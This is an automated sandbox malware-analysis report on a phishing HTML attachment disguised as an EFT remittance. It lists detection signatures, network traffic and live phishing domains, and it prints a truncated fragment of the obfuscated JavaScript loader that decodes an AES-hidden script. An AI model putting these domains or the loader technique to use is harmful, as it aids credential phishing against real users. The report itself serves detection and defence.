Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EFT Remittance_(Rtotino)CQDM.html

Overview

General Information

Sample name:EFT Remittance_(Rtotino)CQDM.html
Analysis ID:1619379
MD5:5e1913816428892f3dcd7006c9777d09
SHA1:204fcb156c7531cf6dbcf94ab6c231731223cc85
SHA256:604035b19d0564f9e1552f0ea20ccb0415ef8e400a122ccb849b55f9f69e248a
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
HTML document with suspicious title
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Rtotino)CQDM.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,2419350445155316135,3379476555480300038,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://i2.ictacquist.ru/vm9xG/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/EFT%20Remittance... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated URLs. It creates a link element, modifies the DOM, and redirects the user to a potentially malicious URL. These actions are highly suspicious and indicate a high likelihood of malicious intent.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://i2.ictacquist.ru/vm9xG/#Y#Mrtotino@grassic... This script demonstrates high-risk behavior, including dynamic code execution via the `eval` function and potential data exfiltration. The use of obfuscated code and multiple fallback domains further increases the risk. This script should be considered highly suspicious and potentially malicious.
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://i2.ictacquist.ru/vm9xG/#Y#Mrtotino@grassic... This script demonstrates high-risk behaviors, including dynamic code execution using `eval` and potential data exfiltration. The obfuscated code and use of a proxy object further increase the risk. This script should be considered highly suspicious and potentially malicious.
Source: EFT Remittance_(Rtotino)CQDM.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Rtotino)CQDM.htmlTab title: EFT Remittance_(Rtotino)CQDM.html
Source: EFT Remittance_(Rtotino)CQDM.htmlHTTP Parser: Base64 decoded: [VDUFGCJ\PEE[ZMICWFR
Source: https://fascia.fit/.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSYHTTP Parser: var iqwbsvwtjudiynuz = document.createelement("script");iqwbsvwtjudiynuz.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(iqwbsvwtjudiynuz);iqwbsvwtjudiynuz.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoielnyzw9wtudhvgrbu2i3ejzgzvrptlv6m1yzmtnmynrvytlxbwdscmjpzvlrsmn5xc9onlmyahnidvhqbnhpce5zruvcl0m1bnfknuhlvmm5dvbjdmfsbhltmuhtwnjwkzjnwjh1agdimzh2nvvlukvny2tysglwbvhxtmjnn0lmb2rsz3yrvmtbvgnhdufhzuowcvbvtmxdslnzb1z3stj4vtbpuuu0t3jncuq3edhcvef2sxbrdnjkwkvxzkxudepusgdtouzyeti2dnk0qmvinhhsdverrtftdedtt3pcotzmaggwdfl3oexvek8xeu1yam55mhnqvdhtnthozvdizhbkdgpjnkpnsenqazhfaeriyu5sqkpcl0rom0fpcepmu2f6v2zhzjj6bllisitkrg9hmdvfwezkelhtnlnad2oxdnixnmiyymrpd3jquutiaknzduhfqkzxduxqz25hujhxnudovuxqdkr2rhcrbuhtteoywvrrcys1tnhdwe9gctj1nuzxvvznuxorz1vpqk1knuw3cm1istjrd2hyztvcwmxtn09ssdq4twj5rhfrxc9xzg1cnkzpbitvahlmcmdfb2jjc0nhzm44tnpnriswvkrrstfhqnz5mxpruhqzovnlb3pschk3rhpgohewnmnjofhjmtjsazzbvlnqwth3tgfhvgpkxc9cejawmwvyz2jptgkyddbjqzzdxc84zm...
Source: EFT Remittance_(Rtotino)CQDM.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Rtotino)CQDM.htmlHTTP Parser: No favicon
Source: https://i2.ictacquist.ru/vm9xG/#workoutsHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49796 version: TLS 1.0
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50029 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 103.83.194.5 103.83.194.5
Source: Joe Sandbox ViewIP Address: 103.83.194.5 103.83.194.5
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49796 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: global trafficHTTP traffic detected: GET /.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY HTTP/1.1Host: fascia.fitConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY HTTP/1.1Host: fascia.fitConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vm9xG/ HTTP/1.1Host: i2.ictacquist.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/0e3e6804b971/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/0e3e6804b971/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=R05RUdql971yFicuYwEXhWNy5BCz.KoHSl_DddWE.yw-1739994008-1.0.1.1-Xk3izrjUqKi9d.fq9X1AoshrY1_G1yF0hnhWRzSqjZDsZ8aFgI._RgsnW7tvaxM7l09Qmpp.VxOQYc5Vf6yWLw
Source: global trafficHTTP traffic detected: GET /tatay$ylatfyo HTTP/1.1Host: hjhyx.br-izeffs.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://i2.ictacquist.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://i2.ictacquist.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tatay$ylatfyo HTTP/1.1Host: hjhyx.br-izeffs.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: fascia.fit
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: i2.ictacquist.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: hjhyx.br-izeffs.ru
Source: chromecache_94.3.dr, chromecache_107.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_98.3.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.wo
Source: chromecache_98.3.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlWHYg.woff2
Source: chromecache_98.3.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlYHYjedg.wo
Source: chromecache_98.3.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.wo
Source: chromecache_98.3.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.wo
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50029 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50033 version: TLS 1.2

System Summary

barindex
Source: Name includes: EFT Remittance_(Rtotino)CQDM.htmlInitial sample: remit
Source: classification engineClassification label: mal72.phis.evad.winHTML@31/27@30/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Rtotino)CQDM.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,2419350445155316135,3379476555480300038,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,2419350445155316135,3379476555480300038,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
